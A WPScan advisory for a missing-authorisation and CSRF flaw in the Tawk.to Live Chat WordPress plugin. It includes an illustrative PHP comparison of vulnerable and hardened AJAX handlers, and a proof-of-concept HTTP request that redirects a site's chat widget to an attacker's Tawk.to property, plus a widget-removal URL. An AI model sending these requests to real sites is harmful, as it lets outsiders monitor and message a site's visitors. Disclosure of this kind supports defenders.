WPScan

WordPress Plugin Vulnerabilities

Tawk.to Live Chat < 0.6.0 - Subscriber+ Visitor Monitoring & Chat Removal

Description

The plugin registers the tawkto_setwidget and tawkto_removewidget AJAX actions (reachable through wp-admin/admin-ajax.php) without any capability or CSRF (nonce) check, so any authenticated user can invoke them. tawkto_setwidget lets low-privileged users, including plain Subscribers, overwrite the 'tawkto-embed-widget-page-id' and 'tawkto-embed-widget-widget-id' settings. Any authenticated user can therefore point the vulnerable site at a Tawk.to property they control and, from their own Tawk.to dashboard, monitor the site's visitors and interact with them (receive contact messages, reply, and so on); they can also display an arbitrary Knowledge Base. tawkto_removewidget removes the live chat widget from the site's pages. Because the nonce check is missing as well, both actions can also be triggered through a forged cross-site request against any logged-in user.
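To make the missing checks concrete, the following is an added illustration, not the plugin's own code: a WordPress AJAX handler in the shape the advisory describes (no nonce, no capability check, raw $_POST written to options), followed by a hardened version that adds both checks plus input validation. The option names are taken from the advisory; the callback names, the nonce action 'tawkto_widget_nonce', the script handle 'tawkto-admin' and the ID formats enforced by the regexes are assumptions for the example.

```php
<?php
/**
 * Added example (not the tawkto-live-chat plugin's code): vulnerable vs. hardened
 * AJAX handlers for the two actions named in the advisory.
 */

// --- Vulnerable pattern (as the advisory describes it) ------------------------
// In the vulnerable plugin these were hooked with
//   add_action( 'wp_ajax_tawkto_setwidget', ... ) / add_action( 'wp_ajax_tawkto_removewidget', ... )
// so every logged-in user, and any page able to forge a request from that
// user's browser, reached them. They are deliberately not hooked here.
function tawkto_setwidget_vulnerable() {
    // No check_ajax_referer(), no current_user_can(): a Subscriber can re-point
    // the site at an attacker-controlled Tawk.to property.
    update_option( 'tawkto-embed-widget-page-id',   $_POST['pageId'] );
    update_option( 'tawkto-embed-widget-widget-id', $_POST['widgetId'] );
    wp_send_json_success();
}

function tawkto_removewidget_vulnerable() {
    delete_option( 'tawkto-embed-widget-page-id' );
    delete_option( 'tawkto-embed-widget-widget-id' );
    wp_send_json_success();
}

// --- Hardened pattern ---------------------------------------------------------
// Both checks are needed: the nonce alone stops CSRF but still lets any
// logged-in user call the action; the capability check alone still allows a
// forged request riding on an administrator's session.
function tawkto_authorize_widget_request() {
    // Dies with HTTP 403 when the 'nonce' field is missing or invalid.
    check_ajax_referer( 'tawkto_widget_nonce', 'nonce' );
    // Only users who may manage site options can change the chat property.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions.' ), 403 );
    }
}

add_action( 'wp_ajax_tawkto_setwidget', 'tawkto_setwidget_hardened' );
function tawkto_setwidget_hardened() {
    tawkto_authorize_widget_request();

    $page_id   = isset( $_POST['pageId'] )   ? sanitize_text_field( wp_unslash( $_POST['pageId'] ) )   : '';
    $widget_id = isset( $_POST['widgetId'] ) ? sanitize_text_field( wp_unslash( $_POST['widgetId'] ) ) : '';

    // Assumed formats, modelled on the PoC values: a 24-hex-character property ID
    // and a short alphanumeric widget ID. Reject anything else before storing.
    if ( ! preg_match( '/^[0-9a-f]{24}$/', $page_id ) || ! preg_match( '/^[a-z0-9]{1,32}$/', $widget_id ) ) {
        wp_send_json_error( array( 'message' => 'Invalid property or widget ID.' ), 400 );
    }

    update_option( 'tawkto-embed-widget-page-id',   $page_id );
    update_option( 'tawkto-embed-widget-widget-id', $widget_id );
    wp_send_json_success();
}

add_action( 'wp_ajax_tawkto_removewidget', 'tawkto_removewidget_hardened' );
function tawkto_removewidget_hardened() {
    tawkto_authorize_widget_request();
    delete_option( 'tawkto-embed-widget-page-id' );
    delete_option( 'tawkto-embed-widget-widget-id' );
    wp_send_json_success();
}

// The admin page that issues these AJAX calls must send the nonce the handler
// verifies. 'tawkto-admin' is an assumed handle for that already-registered script.
add_action( 'admin_enqueue_scripts', function () {
    wp_localize_script( 'tawkto-admin', 'tawktoAjax', array(
        'nonce' => wp_create_nonce( 'tawkto_widget_nonce' ),
    ) );
} );
```

With the hardened handlers in place, the PoC request below fails twice over: without a valid 'nonce' field check_ajax_referer() terminates the request with a 403, and a Subscriber who somehow obtains a nonce is still rejected by the manage_options capability check.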

Proof of Concept

Link the site to an attacker-controlled Tawk.to property (any authenticated session, e.g. a Subscriber, will do):

POST /wp-admin/admin-ajax.php?action=tawkto_setwidget HTTP/1.1
Host: example.com
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 50
Content-Type: application/x-www-form-urlencoded
Cookie: [any authenticated user]

pageId=61786f4e86aee40a573880d7&widgetId=1fiv75jah

Remove the live chat widget from the site (an authenticated request to this URL is enough):

https://example.com/wp-admin/admin-ajax.php?action=tawkto_removewidget

Affects Plugins

tawkto-live-chat
Fixed in version 0.6.0

References

CVE
CVE-2021-24914

Classification

Type

NO AUTHORISATION

OWASP top 10
A5: Broken Access Control
CWE
CWE-862

Miscellaneous

Original Researcher

Quentin VILLAIN (3wsec)

Submitter

Quentin VILLAIN (3wsec)

Submitter website
https://3wsec.fr
Verified

Yes

WPVDB ID
39392055-8cd3-452f-8bcb-a650f5bddc2e

Timeline

Publicly Published

2021-11-08

Added

2021-11-08

Last Updated

2022-04-11
